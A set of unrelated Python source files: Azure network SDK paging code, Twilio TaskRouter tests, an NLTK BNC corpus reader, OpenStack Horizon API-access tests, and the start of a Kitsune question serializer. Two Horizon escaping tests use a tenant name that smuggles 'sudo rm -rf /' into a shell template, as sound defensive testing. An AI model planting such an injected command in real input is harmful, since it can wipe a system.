request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('IpGroupListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ipGroups'} # type: ignore
def list(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.IpGroupListResult"]
"""Gets all IpGroups in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either IpGroupListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_12_01.models.IpGroupListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IpGroupListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('IpGroupListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/ipGroups'} # type: ignore
|
|
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from tests import IntegrationTestCase
from tests.holodeck import Request
from twilio.base.exceptions import TwilioException
from twilio.http.response import Response
class ActivityTestCase(IntegrationTestCase):
def test_fetch_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.activities(sid="WAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.holodeck.assert_has_request(Request(
'get',
'https://taskrouter.twilio.com/v1/Workspaces/WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Activities/WAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_fetch_response(self):
self.holodeck.mock(Response(
200,
'''
{
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"available": true,
"date_created": "2014-05-14T10:50:02Z",
"date_updated": "2014-05-14T23:26:06Z",
"friendly_name": "New Activity",
"sid": "WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"url": "https://taskrouter.twilio.com/v1/Workspaces/WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Activities/WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"workspace_sid": "WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
'''
))
actual = self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.activities(sid="WAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.assertIsNotNone(actual)
def test_update_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.activities(sid="WAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").update()
self.holodeck.assert_has_request(Request(
'post',
'https://taskrouter.twilio.com/v1/Workspaces/WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Activities/WAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_update_response(self):
self.holodeck.mock(Response(
200,
'''
{
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"available": true,
"date_created": "2014-05-14T10:50:02Z",
"date_updated": "2014-05-14T23:26:06Z",
"friendly_name": "New Activity",
"sid": "WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"url": "https://taskrouter.twilio.com/v1/Workspaces/WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Activities/WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"workspace_sid": "WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
'''
))
actual = self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.activities(sid="WAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").update()
self.assertIsNotNone(actual)
def test_delete_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.activities(sid="WAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").delete()
self.holodeck.assert_has_request(Request(
'delete',
'https://taskrouter.twilio.com/v1/Workspaces/WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Activities/WAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_delete_response(self):
self.holodeck.mock(Response(
204,
None,
))
actual = self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.activities(sid="WAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").delete()
self.assertTrue(actual)
def test_list_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.activities.list()
self.holodeck.assert_has_request(Request(
'get',
'https://taskrouter.twilio.com/v1/Workspaces/WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Activities',
))
def test_read_full_response(self):
self.holodeck.mock(Response(
200,
'''
{
"activities": [
{
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"available": true,
"date_created": "2014-05-14T10:50:02Z",
"date_updated": "2014-05-14T23:26:06Z",
"friendly_name": "New Activity",
"sid": "WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"url": "https://taskrouter.twilio.com/v1/Workspaces/WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Activities/WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"workspace_sid": "WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
],
"meta": {
"first_page_url": "https://taskrouter.twilio.com/v1/Workspaces/WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Activities?PageSize=50&Page=0",
"key": "activities",
"last_page_url": "https://taskrouter.twilio.com/v1/Workspaces/WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Activities?PageSize=50&Page=0",
"next_page_url": null,
"page": 0,
"page_size": 50,
"previous_page_url": null,
"url": "https://taskrouter.twilio.com/v1/Workspaces/WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Activities?PageSize=50&Page=0"
}
}
'''
))
actual = self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.activities.list()
self.assertIsNotNone(actual)
def test_read_empty_response(self):
self.holodeck.mock(Response(
200,
'''
{
"activities": [],
"meta": {
"first_page_url": "https://taskrouter.twilio.com/v1/Workspaces/WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Activities?PageSize=50&Page=0",
"key": "activities",
"last_page_url": "https://taskrouter.twilio.com/v1/Workspaces/WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Activities?PageSize=50&Page=0",
"next_page_url": null,
"page": 0,
"page_size": 50,
"previous_page_url": null,
"url": "https://taskrouter.twilio.com/v1/Workspaces/WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Activities?PageSize=50&Page=0"
}
}
'''
))
actual = self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.activities.list()
self.assertIsNotNone(actual)
def test_create_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.activities.create(friendly_name="friendly_name")
values = {'FriendlyName': "friendly_name", }
self.holodeck.assert_has_request(Request(
'post',
'https://taskrouter.twilio.com/v1/Workspaces/WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Activities',
data=values,
))
def test_create_response(self):
self.holodeck.mock(Response(
201,
'''
{
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"available": true,
"date_created": "2014-05-14T10:50:02Z",
"date_updated": "2014-05-14T23:26:06Z",
"friendly_name": "New Activity",
"sid": "WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"url": "https://taskrouter.twilio.com/v1/Workspaces/WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Activities/WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"workspace_sid": "WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
'''
))
actual = self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.activities.create(friendly_name="friendly_name")
self.assertIsNotNone(actual)
|
|
# Natural Language Toolkit: Plaintext Corpus Reader
#
# Copyright (C) 2001-2012 NLTK Project
# Author: Edward Loper <[email protected]>
# URL: <http://www.nltk.org/>
# For license information, see LICENSE.TXT
"""
Corpus reader for the XML version of the British National Corpus.
"""
__docformat__ = 'epytext en'
import re
import xml.etree.ElementTree as ET
from api import *
from util import *
from xmldocs import *
class BNCCorpusReader(XMLCorpusReader):
"""
Corpus reader for the XML version of the British National Corpus.
For access to the complete XML data structure, use the ``xml()``
method. For access to simple word lists and tagged word lists, use
``words()``, ``sents()``, ``tagged_words()``, and ``tagged_sents()``.
"""
def __init__(self, root, fileids, lazy=True):
XMLCorpusReader.__init__(self, root, fileids)
self._lazy = lazy
def words(self, fileids=None, strip_space=True, stem=False):
"""
:return: the given file(s) as a list of words
and punctuation symbols.
:rtype: list(str)
:param strip_space: If true, then strip trailing spaces from
word tokens. Otherwise, leave the spaces on the tokens.
:param stem: If true, then use word stems instead of word strings.
"""
if self._lazy:
return concat([BNCWordView(fileid, False, None,
strip_space, stem)
for fileid in self.abspaths(fileids)])
else:
return concat([self._words(fileid, False, None,
strip_space, stem)
for fileid in self.abspaths(fileids)])
def tagged_words(self, fileids=None, c5=False, strip_space=True, stem=False):
"""
:return: the given file(s) as a list of tagged
words and punctuation symbols, encoded as tuples
``(word,tag)``.
:rtype: list(tuple(str,str))
:param c5: If true, then the tags used will be the more detailed
c5 tags. Otherwise, the simplified tags will be used.
:param strip_space: If true, then strip trailing spaces from
word tokens. Otherwise, leave the spaces on the tokens.
:param stem: If true, then use word stems instead of word strings.
"""
if c5: tag = 'c5'
else: tag = 'pos'
if self._lazy:
return concat([BNCWordView(fileid, False, tag, strip_space, stem)
for fileid in self.abspaths(fileids)])
else:
return concat([self._words(fileid, False, tag, strip_space, stem)
for fileid in self.abspaths(fileids)])
def sents(self, fileids=None, strip_space=True, stem=False):
"""
:return: the given file(s) as a list of
sentences or utterances, each encoded as a list of word
strings.
:rtype: list(list(str))
:param strip_space: If true, then strip trailing spaces from
word tokens. Otherwise, leave the spaces on the tokens.
:param stem: If true, then use word stems instead of word strings.
"""
if self._lazy:
return concat([BNCWordView(fileid, True, None, strip_space, stem)
for fileid in self.abspaths(fileids)])
else:
return concat([self._words(fileid, True, None, strip_space, stem)
for fileid in self.abspaths(fileids)])
def tagged_sents(self, fileids=None, c5=False, strip_space=True,
stem=False):
"""
:return: the given file(s) as a list of
sentences, each encoded as a list of ``(word,tag)`` tuples.
:rtype: list(list(tuple(str,str)))
:param c5: If true, then the tags used will be the more detailed
c5 tags. Otherwise, the simplified tags will be used.
:param strip_space: If true, then strip trailing spaces from
word tokens. Otherwise, leave the spaces on the tokens.
:param stem: If true, then use word stems instead of word strings.
"""
if c5: tag = 'c5'
else: tag = 'pos'
if self._lazy:
return concat([BNCWordView(fileid, True, tag, strip_space, stem)
for fileid in self.abspaths(fileids)])
else:
return concat([self._words(fileid, True, tag, strip_space, stem)
for fileid in self.abspaths(fileids)])
def _words(self, fileid, bracket_sent, tag, strip_space, stem):
"""
Helper used to implement the view methods -- returns a list of
words or a list of sentences, optionally tagged.
:param fileid: The name of the underlying file.
:param bracket_sent: If true, include sentence bracketing.
:param tag: The name of the tagset to use, or None for no tags.
:param strip_space: If true, strip spaces from word tokens.
:param stem: If true, then substitute stems for words.
"""
result = []
xmldoc = ElementTree.parse(fileid).getroot()
for xmlsent in xmldoc.findall('.//s'):
sent = []
for xmlword in _all_xmlwords_in(xmlsent):
word = xmlword.text
if not word:
word = "" # fixes issue 337?
if strip_space or stem: word = word.strip()
if stem: word = xmlword.get('hw', word)
if tag == 'c5':
word = (word, xmlword.get('c5'))
elif tag == 'pos':
word = (word, xmlword.get('pos', xmlword.get('c5')))
sent.append(word)
if bracket_sent:
result.append(BNCSentence(xmlsent.attrib['n'], sent))
else:
result.extend(sent)
assert None not in result
return result
def _all_xmlwords_in(elt, result=None):
if result is None: result = []
for child in elt:
if child.tag in ('c', 'w'): result.append(child)
else: _all_xmlwords_in(child, result)
return result
class BNCSentence(list):
"""
A list of words, augmented by an attribute ``num`` used to record
the sentence identifier (the ``n`` attribute from the XML).
"""
def __init__(self, num, items):
self.num = num
list.__init__(self, items)
class BNCWordView(XMLCorpusView):
"""
A stream backed corpus view specialized for use with the BNC corpus.
"""
def __init__(self, fileid, sent, tag, strip_space, stem):
"""
:param fileid: The name of the underlying file.
:param sent: If true, include sentence bracketing.
:param tag: The name of the tagset to use, or None for no tags.
:param strip_space: If true, strip spaces from word tokens.
:param stem: If true, then substitute stems for words.
"""
if sent: tagspec = '.*/s'
else: tagspec = '.*/s/(.*/)?(c|w)'
self._sent = sent
self._tag = tag
self._strip_space = strip_space
self._stem = stem
XMLCorpusView.__init__(self, fileid, tagspec)
# Read in a tasty header.
self._open()
self.read_block(self._stream, '.*/teiHeader$', self.handle_header)
self.close()
# Reset tag context.
self._tag_context = {0: ()}
title = None #: Title of the document.
author = None #: Author of the document.
editor = None #: Editor
resps = None #: Statement of responsibility
def handle_header(self, elt, context):
# Set up some metadata!
titles = elt.findall('titleStmt/title')
if titles: self.title = '\n'.join(
[title.text.strip() for title in titles])
authors = elt.findall('titleStmt/author')
if authors: self.author = '\n'.join(
[author.text.strip() for author in authors])
editors = elt.findall('titleStmt/editor')
if editors: self.editor = '\n'.join(
[editor.text.strip() for editor in editors])
resps = elt.findall('titleStmt/respStmt')
if resps: self.resps = '\n\n'.join([
'\n'.join([resp_elt.text.strip() for resp_elt in resp])
for resp in resps])
def handle_elt(self, elt, context):
if self._sent: return self.handle_sent(elt)
else: return self.handle_word(elt)
def handle_word(self, elt):
word = elt.text
if not word:
word = "" # fixes issue 337?
if self._strip_space or self._stem:
word = word.strip()
if self._stem:
word = elt.get('hw', word)
if self._tag == 'c5':
word = (word, elt.get('c5'))
elif self._tag == 'pos':
word = (word, elt.get('pos', elt.get('c5')))
return word
def handle_sent(self, elt):
sent = []
for child in elt:
if child.tag == 'mw':
sent += [self.handle_word(w) for w in child]
elif child.tag in ('w','c'):
sent.append(self.handle_word(child))
else:
raise ValueError('Unexpected element %s' % child.tag)
return BNCSentence(elt.attrib['n'], sent)
|
|
# Copyright 2012 Nebula Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
import yaml
from django import template
from django.template import loader
from django.test.utils import override_settings
from django.urls import reverse
from openstack_dashboard import api
from openstack_dashboard.test import helpers as test
INDEX_URL = reverse('horizon:project:api_access:index')
API_URL = "horizon:project:api_access"
EC2_URL = reverse(API_URL + ":ec2")
OPENRC_URL = reverse(API_URL + ":openrc")
OPENRCV2_URL = reverse(API_URL + ":openrcv2")
CREDS_URL = reverse(API_URL + ":view_credentials")
RECREATE_CREDS_URL = reverse(API_URL + ":recreate_credentials")
class APIAccessTests(test.TestCase):
@test.create_mocks({api.keystone: ('create_ec2_credentials',
'list_ec2_credentials')})
def test_ec2_download_view(self):
creds = self.ec2.first()
self.mock_list_ec2_credentials.return_value = []
self.mock_create_ec2_credentials.return_value = creds
res = self.client.get(EC2_URL)
self.assertEqual(res.status_code, 200)
self.assertEqual(res['content-type'], 'application/zip')
self.mock_list_ec2_credentials.assert_called_once_with(
test.IsHttpRequest(), self.user.id)
self.mock_create_ec2_credentials.assert_called_once_with(
test.IsHttpRequest(), self.user.id, self.tenant.id)
def test_openrcv2_credentials(self):
res = self.client.get(OPENRCV2_URL)
self.assertEqual(res.status_code, 200)
openrc = 'project/api_access/openrc_v2.sh.template'
self.assertTemplateUsed(res, openrc)
name = 'export OS_USERNAME="{}"'.format(self.request.user.username)
t_id = 'export OS_TENANT_ID={}'.format(self.request.user.tenant_id)
domain = 'export OS_USER_DOMAIN_NAME="{}"'.format(
self.request.user.user_domain_name)
self.assertIn(name.encode('utf-8'), res.content)
self.assertIn(t_id.encode('utf-8'), res.content)
# domain content should not be present for v2
self.assertNotIn(domain.encode('utf-8'), res.content)
@override_settings(OPENSTACK_API_VERSIONS={"identity": 3})
def test_openrc_credentials(self):
res = self.client.get(OPENRC_URL)
self.assertEqual(res.status_code, 200)
openrc = 'project/api_access/openrc.sh.template'
self.assertTemplateUsed(res, openrc)
name = 'export OS_USERNAME="{}"'.format(self.request.user.username)
p_id = 'export OS_PROJECT_ID={}'.format(self.request.user.tenant_id)
domain = 'export OS_USER_DOMAIN_NAME="{}"'.format(
self.request.user.user_domain_name)
self.assertIn(name.encode('utf-8'), res.content)
self.assertIn(p_id.encode('utf-8'), res.content)
self.assertIn(domain.encode('utf-8'), res.content)
@test.create_mocks({api.keystone: ('list_ec2_credentials',)})
def test_credential_api(self):
certs = self.ec2.list()
self.mock_list_ec2_credentials.return_value = certs
res = self.client.get(CREDS_URL)
self.assertEqual(res.status_code, 200)
credentials = 'project/api_access/credentials.html'
self.assertTemplateUsed(res, credentials)
self.assertEqual(self.user.id, res.context['openrc_creds']['user'].id)
self.assertEqual(certs[0].access,
res.context['ec2_creds']['ec2_access_key'])
self.mock_list_ec2_credentials.assert_called_once_with(
test.IsHttpRequest(), self.user.id)
@test.create_mocks({api.keystone: ('create_ec2_credentials',
'list_ec2_credentials',
'delete_user_ec2_credentials')})
def _test_recreate_user_credentials(self, exists_credentials=True):
old_creds = self.ec2.list() if exists_credentials else []
new_creds = self.ec2.first()
self.mock_list_ec2_credentials.return_value = old_creds
if exists_credentials:
self.mock_delete_user_ec2_credentials.return_value = []
self.mock_create_ec2_credentials.return_value = new_creds
res_get = self.client.get(RECREATE_CREDS_URL)
self.assertEqual(res_get.status_code, 200)
credentials = \
'project/api_access/recreate_credentials.html'
self.assertTemplateUsed(res_get, credentials)
res_post = self.client.post(RECREATE_CREDS_URL)
self.assertNoFormErrors(res_post)
self.assertRedirectsNoFollow(res_post, INDEX_URL)
self.mock_list_ec2_credentials.assert_called_once_with(
test.IsHttpRequest(), self.user.id)
if exists_credentials:
self.mock_delete_user_ec2_credentials.assert_called_once_with(
test.IsHttpRequest(), self.user.id, old_creds[0].access)
else:
self.mock_delete_user_ec2_credentials.assert_not_called()
self.mock_create_ec2_credentials.assert_called_once_with(
test.IsHttpRequest(), self.user.id, self.tenant.id)
def test_recreate_user_credentials(self):
self._test_recreate_user_credentials()
def test_recreate_user_credentials_with_no_existing_creds(self):
self._test_recreate_user_credentials(exists_credentials=False)
class ASCIITenantNameRCTests(test.TestCase):
TENANT_NAME = 'tenant'
def _setup_user(self, **kwargs):
super(ASCIITenantNameRCTests, self)._setup_user(
tenant_name=self.TENANT_NAME)
def test_openrcv2_credentials_filename(self):
expected = 'attachment; filename="%s-openrc.sh"' % self.TENANT_NAME
res = self.client.get(OPENRCV2_URL)
self.assertEqual(res.status_code, 200)
self.assertEqual(expected, res['content-disposition'])
@override_settings(OPENSTACK_API_VERSIONS={"identity": 3})
def test_openrc_credentials_filename(self):
expected = 'attachment; filename="%s-openrc.sh"' % self.TENANT_NAME
res = self.client.get(OPENRC_URL)
self.assertEqual(res.status_code, 200)
self.assertEqual(expected, res['content-disposition'])
class UnicodeTenantNameRCTests(test.TestCase):
TENANT_NAME = u'\u043f\u0440\u043e\u0435\u043a\u0442'
def _setup_user(self, **kwargs):
super(UnicodeTenantNameRCTests, self)._setup_user(
tenant_name=self.TENANT_NAME)
def test_openrcv2_credentials_filename(self):
expected = ('attachment; filename="%s-openrc.sh"' %
self.TENANT_NAME).encode('utf-8')
res = self.client.get(OPENRCV2_URL)
self.assertEqual(res.status_code, 200)
result_content_disposition = res['content-disposition']
# we need to encode('latin-1') because django response object
# has custom setter which encodes all values to latin-1 for Python3.
# https://github.com/django/django/blob/1.9.6/django/http/response.py#L142
# see _convert_to_charset() method for details.
if six.PY3:
result_content_disposition = result_content_disposition.\
encode('latin-1')
self.assertEqual(expected,
result_content_disposition)
@override_settings(OPENSTACK_API_VERSIONS={"identity": 3})
def test_openrc_credentials_filename(self):
expected = ('attachment; filename="%s-openrc.sh"' %
self.TENANT_NAME).encode('utf-8')
res = self.client.get(OPENRC_URL)
self.assertEqual(res.status_code, 200)
result_content_disposition = res['content-disposition']
if six.PY3:
result_content_disposition = result_content_disposition.\
encode('latin-1')
self.assertEqual(expected,
result_content_disposition)
class FakeUser(object):
username = "cool user"
class TemplateRenderTest(test.TestCase):
"""Tests for templates render."""
def test_openrc_html_escape(self):
context = {
"user": FakeUser(),
"tenant_id": "some-cool-id",
"auth_url": "http://tests.com",
"tenant_name": "ENG Perf R&D"}
out = loader.render_to_string(
'project/api_access/openrc.sh.template',
context,
template.Context(context))
self.assertNotIn("&", out)
self.assertIn("ENG Perf R&D", out)
def test_openrc_html_evil_shell_escape(self):
context = {
"user": FakeUser(),
"tenant_id": "some-cool-id",
"auth_url": "http://tests.com",
"tenant_name": 'o"; sudo rm -rf /'}
out = loader.render_to_string(
'project/api_access/openrc.sh.template',
context,
template.Context(context))
self.assertNotIn('o"', out)
self.assertIn('\"', out)
def test_openrc_html_evil_shell_backslash_escape(self):
context = {
"user": FakeUser(),
"tenant_id": "some-cool-id",
"auth_url": "http://tests.com",
"tenant_name": 'o\"; sudo rm -rf /'}
out = loader.render_to_string(
'project/api_access/openrc.sh.template',
context,
template.Context(context))
self.assertNotIn('o\"', out)
self.assertNotIn('o"', out)
self.assertIn('\\"', out)
def test_openrc_set_region(self):
context = {
"user": FakeUser(),
"tenant_id": "some-cool-id",
"auth_url": "http://tests.com",
"tenant_name": "Tenant",
"region": "Colorado"}
out = loader.render_to_string(
'project/api_access/openrc.sh.template',
context,
template.Context(context))
self.assertIn("OS_REGION_NAME=\"Colorado\"", out)
def test_openrc_region_not_set(self):
context = {
"user": FakeUser(),
"tenant_id": "some-cool-id",
"auth_url": "http://tests.com",
"tenant_name": "Tenant"}
out = loader.render_to_string(
'project/api_access/openrc.sh.template',
context,
template.Context(context))
self.assertIn("OS_REGION_NAME=\"\"", out)
def test_clouds_yaml_set_region(self):
context = {
"cloud_name": "openstack",
"user": FakeUser(),
"tenant_id": "some-cool-id",
"auth_url": "http://example.com",
"tenant_name": "Tenant",
"region": "Colorado"}
out = yaml.safe_load(loader.render_to_string(
'project/api_access/clouds.yaml.template',
context,
template.Context(context)))
self.assertIn('clouds', out)
self.assertIn('openstack', out['clouds'])
self.assertNotIn('profile', out['clouds']['openstack'])
self.assertEqual(
"http://example.com",
out['clouds']['openstack']['auth']['auth_url'])
self.assertEqual("Colorado", out['clouds']['openstack']['region_name'])
self.assertNotIn('regions', out['clouds']['openstack'])
def test_clouds_yaml_region_not_set(self):
context = {
"cloud_name": "openstack",
"user": FakeUser(),
"tenant_id": "some-cool-id",
"auth_url": "http://example.com",
"tenant_name": "Tenant"}
out = yaml.safe_load(loader.render_to_string(
'project/api_access/clouds.yaml.template',
context,
template.Context(context)))
self.assertIn('clouds', out)
self.assertIn('openstack', out['clouds'])
self.assertNotIn('profile', out['clouds']['openstack'])
self.assertEqual(
"http://example.com",
out['clouds']['openstack']['auth']['auth_url'])
self.assertNotIn('region_name', out['clouds']['openstack'])
self.assertNotIn('regions', out['clouds']['openstack'])
def test_clouds_yaml_regions(self):
regions = ['region1', 'region2']
context = {
"cloud_name": "openstack",
"user": FakeUser(),
"tenant_id": "some-cool-id",
"auth_url": "http://example.com",
"tenant_name": "Tenant",
"regions": regions}
out = yaml.safe_load(loader.render_to_string(
'project/api_access/clouds.yaml.template',
context,
template.Context(context)))
self.assertIn('clouds', out)
self.assertIn('openstack', out['clouds'])
self.assertNotIn('profile', out['clouds']['openstack'])
self.assertEqual(
"http://example.com",
out['clouds']['openstack']['auth']['auth_url'])
self.assertNotIn('region_name', out['clouds']['openstack'])
self.assertIn('regions', out['clouds']['openstack'])
self.assertEqual(regions, out['clouds']['openstack']['regions'])
def test_clouds_yaml_profile(self):
regions = ['region1', 'region2']
context = {
"cloud_name": "openstack",
"user": FakeUser(),
"profile": "example",
"tenant_id": "some-cool-id",
"auth_url": "http://example.com",
"tenant_name": "Tenant",
"regions": regions}
out = yaml.safe_load(loader.render_to_string(
'project/api_access/clouds.yaml.template',
context,
template.Context(context)))
self.assertIn('clouds', out)
self.assertIn('openstack', out['clouds'])
self.assertIn('profile', out['clouds']['openstack'])
self.assertEqual('example', out['clouds']['openstack']['profile'])
self.assertNotIn('auth_url', out['clouds']['openstack']['auth'])
self.assertNotIn('region_name', out['clouds']['openstack'])
self.assertNotIn('regions', out['clouds']['openstack'])
|
|
from datetime import datetime
import actstream.actions
import django_filters
import json
from django.contrib.contenttypes.models import ContentType
from django.db.models import Q
from rest_framework import serializers, viewsets, permissions, filters, status, pagination
from rest_framework.decorators import detail_route
from rest_framework.response import Response
from taggit.models import Tag
from kitsune.products.api_utils import TopicField
from kitsune.products.models import Product, Topic
from kitsune.questions.models import (
Question, Answer, QuestionMetaData, AlreadyTakenException,
InvalidUserException, QuestionVote, AnswerVote)
from kitsune.sumo.api_utils import (
DateTimeUTCField, OnlyCreatorEdits, GenericAPIException, SplitSourceField)
from kitsune.tags.utils import add_existing_tag
from kitsune.upload.models import ImageAttachment
from kitsune.users.api import ProfileFKSerializer
from kitsune.users.models import Profile
class QuestionMetaDataSerializer(serializers.ModelSerializer):
question = serializers.PrimaryKeyRelatedField(
required=False,
write_only=True,
queryset=Question.objects.all())
class Meta:
model = QuestionMetaData
fields = ('name', 'value', 'question')
class QuestionTagSerializer(serializers.ModelSerializer):
class Meta:
model = Tag
fields = ('name', 'slug')
class QuestionSerializer(serializers.ModelSerializer):
answers = serializers.PrimaryKeyRelatedField(many=True, read_only=True)
content = SplitSourceField(read_source='content_parsed', write_source='content')
created = DateTimeUTCField(read_only=True)
creator = serializers.SerializerMethodField()
involved = serializers.SerializerMethodField()
is_solved = serializers.ReadOnlyField()
is_taken = serializers.ReadOnlyField()
metadata = QuestionMetaDataSerializer(source='metadata_set', read_only=True, many=True)
num_votes = serializers.ReadOnlyField()
product = serializers.SlugRelatedField(
required=True,
slug_field='slug',
queryset=Product.objects.all())
tags = QuestionTagSerializer(read_only=True, many=True)
solution = serializers.PrimaryKeyRelatedField(read_only=True)
solved_by = serializers.SerializerMethodField()
taken_by = serializers.SerializerMethodField()
topic = TopicField(required=True, queryset=Topic.objects.all())
updated = DateTimeUTCField(read_only=True)
updated_by = serializers.SerializerMethodField()
class Meta:
model = Question
fields = (
'answers',
'content',
'created',
'creator',
'id',
'involved',
'is_archived',
'is_locked',
'is_solved',
'is_spam',
'is_taken',
'last_answer',
'locale',
'metadata',
'tags',
'num_answers',
'num_votes_past_week',
'num_votes',
